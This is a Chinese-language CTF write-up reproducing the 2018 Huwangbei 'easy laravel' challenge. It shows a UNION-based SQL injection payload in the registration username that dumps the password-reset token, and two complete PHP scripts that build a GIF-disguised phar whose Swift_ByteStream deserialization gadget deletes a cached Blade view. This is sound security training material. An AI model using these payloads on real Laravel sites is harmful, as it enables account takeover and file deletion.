题目docker环境:

https://github.com/sco4x0/huwangbei2018_easy_laravel

git clone下来直接composer up -d 运行即可,可以把端口映射改为8080:80

 使用 docker exec -it 容器name bash就可以交互式地进入容器进行操作

开始做题:

首先F12查看源码发现源代码路径:

但是现在复现的时候已经关闭了,从github上题目源码中直接把源码拷过来吧。

遇到有composer.json的题目,首先composer install安装一下相关的包依赖,这里首先需要本机已经安装composer,没有安装的则:

  1. http://www.runoob.com/w3cnote/composer-install-and-usage.html //composer的安装步骤

安装完以后按道理可以执行composer install进行安装了,但是连接超时,此时我尝试了挂上代理去执行试试,结合shadowsocks+proxychains

  1. sslocal -c /etc/shadowsocks/config.json 2&>1

本地开启ss客户端,配置1080端口的socks5代理,然后执行

  1. proxychains composer install

此时安装成功包依赖,权限问题的话记得sudo一下

如果遇到问题:

  1. Your requirements could not be resolved to an installable set of packages //执行下一条即可
  1. composer install --ignore-platform-reqs

安装完成后就可以看到vendor目录了,

 

 

 

 

此时可以进行代码审计了。

 此时可以先使用php artisan route:list查看一下已经定义的路由

也可以在routers/web.php里面进行查看,这里面定义了web访问的路由,其中admin中间件中定义email必须为admin@qvq.im,但是注册的时候这个邮箱显示已经被注册过了,所以

而根据database的目录中表名和字段名虽然能够dump出来,但是在注册时是经过bcrypt加密的,无法进行解密

database目录中包含了应用初始时的一些数据库相关信息,可以进行查看:

 

 

知道了邮箱,但是没有密码,但是有重置密码的功能,而密码重置需要用到token,因此尝试注入把token从migrations目录的password_reset定义的password_resets表中dump出来。

首先看看密码重置的控制逻辑:

首先根据路由规则:

$this->get(‘password/reset/{token}’, ‘Auth\ResetPasswordController@showResetForm’);

先找到对应的控制器文件:

而在此控制器文件中又使用了 use Illuminate\Foundation\Auth\ResetsPasswords;

而ResetsPasswords是一个trait,其不能实例化,定义它的目的是为了进行代码复用,此时在这里方便在控制器类resetpassword中使用,又因为当访问

password/reset/{token}时会触发Auth\ResetPasswordController@showResetForm,显示重置密码的表单,那么我们需要去找到这个token从而去构造出这个重置密码的链接,此时就可以利用之前的sql注入

去dump出来重置以后的token,然后来进行登陆

 使用以下语句注册作为用户名:

  1. admin' union select 1,(select token from password_resets limit 0,1),3,4,5#

 可以得到重置用户的token

 此时可以拼接重置密码的链接得到重置密码页面:

 

然后使用重置的密码进行登陆:

可以看到有几个功能,点击flag,返回no flag

 而路由中有Route::get(‘/flag’, ‘FlagController@showFlag’)->name(‘flag’);

此时将调用showflag

此时按道理应该直接返回flag,但是却没有正常返回

这里需要学习一下blade

  1. Blade 是由 Laravel 提供的非常简单但功能强大的模板引擎,不同于其他流行的 PHP 模板引擎,Blade 在视图中并不约束你使用 PHP 原生代码。
    所有的 Blade 视图最终都会被编译成原生 PHP 代码并缓存起来直到被修改,这意味着对应用的性能而言 Blade 基本上是零开销。
    Blade 视图文件使用 .blade.php 文件扩展并存放在 resources/views 目录下。

 这是因为模板编译后的文件没有删除而导致无法显示flag,因此需要删除编译后的模板文件,所以需要知道编译后的文件名:

编译后文件的路径由两部分构成第一部分是模板的绝对路径path,第二部分是是缓存路径,又因为缓存路径为/storage/framework/views/,

其中/usr/share/nginx/html/是nginx的默认web路径,由提示的得到,path为/usr/share/nginx/html/resources/views/auth/flag.blade.php的sha1值

即可以得到编译后的文件的路径:

/usr/share/nginx/html/storage/framework/views/34e41df0934a75437873264cd28e2d835bc38772.php

此时需要删除掉此文件,然后访问flag,结合上传功能中的反序列化:

在上传中只检查了后缀名是否在白名单之内,不对内容进行检查,并且如果合法则存到app/public下面,并且在check中存在file_exists函数,并且path和filename都是可以控制的,因此可以phar反序列化

因此需要找到反序列化函数:

可以找到所有的含有__destruct的组件然后再在里面寻找是否含有unlink函数,这里采用Swift_ByteStream_TemporaryFileByteStream的析构函数中存在unlink方法

利用exp.php

  1. <?php
  2. class Swift_ByteStream_AbstractFilterableInputStream {
  3. /**
  4. * Write sequence.
  5. */
  6. protected $sequence = 0;
  7. /**
  8. * StreamFilters.
  9. *
  10. * @var Swift_StreamFilter[]
  11. */
  12. private $filters = [];
  13. /**
  14. * A buffer for writing.
  15. */
  16. private $writeBuffer = '';
  17. /**
  18. * Bound streams.
  19. *
  20. * @var Swift_InputByteStream[]
  21. */
  22. private $mirrors = [];
  23. }
  24. class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream {
  25. /** The internal pointer offset */
  26. private $_offset = 0;
  27. /** The path to the file */
  28. private $_path;
  29. /** The mode this file is opened in for writing */
  30. private $_mode;
  31. /** A lazy-loaded resource handle for reading the file */
  32. private $_reader;
  33. /** A lazy-loaded resource handle for writing the file */
  34. private $_writer;
  35. /** If magic_quotes_runtime is on, this will be true */
  36. private $_quotes = false;
  37. /** If stream is seekable true/false, or null if not known */
  38. private $_seekable = null;
  39. /**
  40. * Create a new FileByteStream for $path.
  41. *
  42. * @param string $path
  43. * @param bool $writable if true
  44. */
  45. public function __construct($path, $writable = false)
  46. {
  47. $this->_path = $path;
  48. $this->_mode = $writable ? 'w+b' : 'rb';
  49. if (function_exists('get_magic_quotes_runtime') && @get_magic_quotes_runtime() == 1) {
  50. $this->_quotes = true;
  51. }
  52. }
  53. /**
  54. * Get the complete path to the file.
  55. *
  56. * @return string
  57. */
  58. public function getPath()
  59. {
  60. return $this->_path;
  61. }
  62. }
  63. class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStream {
  64. public function __construct() {
  65. $filePath = "/usr/share/nginx/html/storage/framework/views/34e41df0934a75437873264cd28e2d835bc38772.php";
  66. parent::__construct($filePath, true);
  67. }
  68. public function __destruct() {
  69. if (file_exists($this->getPath())) {
  70. @unlink($this->getPath());
  71. }
  72. }
  73. }
  74. $obj = new Swift_ByteStream_TemporaryFileByteStream();
  75. $p = new Phar('./1.phar', 0);
  76. $p->startBuffering();
  77. $p->setStub('GIF89a<?php __HALT_COMPILER(); ?>');
  78. $p->setMetadata($obj);
  79. $p->addFromString('1.txt','text');
  80. $p->stopBuffering();
  81. rename('./1.phar', '1.gif');
  82. ?>

在vendor下面有autoload.php文件,因此可以直接include此文件进行构造phar包,

采用exp

  1. <?php
  2. include('autoload.php');
  3. $a = serialize(new Swift_ByteStream_TemporaryFileByteStream());
  4. var_dump(unserialize($a));
  5. var_dump($a);
  6. $a = preg_replace('/\/tmp\/FileByteStream[\w]{6}/', "/usr/share/nginx/html/storage/framework/views/34e41df0934a75437873264cd28e2d835bc38772.php", $a); //将其换成要删除的文件名
  7. $a = str_replace('s:25', 's:90', $a); //修改对应的序列化数据长度
  8. var_dump($a);
  9. $b = unserialize($a);
  10. $p = new Phar('./tr1ple.phar', 0);
  11. $p->startBuffering();
  12. $p->setStub('GIF89a<?php __HALT_COMPILER(); ?>');
  13. $p->setMetadata($b);
  14. $p->addFromString('test.txt','text');
  15. $p->stopBuffering();
  16. rename('tr1ple.phar', 'tr1ple.gif')
  17. ?>

cli下面php.ini中的phar的read only要off,然后上传gif.在file界面点check再更改path路径就可以触发反序列化,path这里要用到绝对路径,并且存储的目录在storge/app/public下面

 

 

 

 

 

版权声明:本文为wfzWebSecuity原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/wfzWebSecuity/p/11044313.html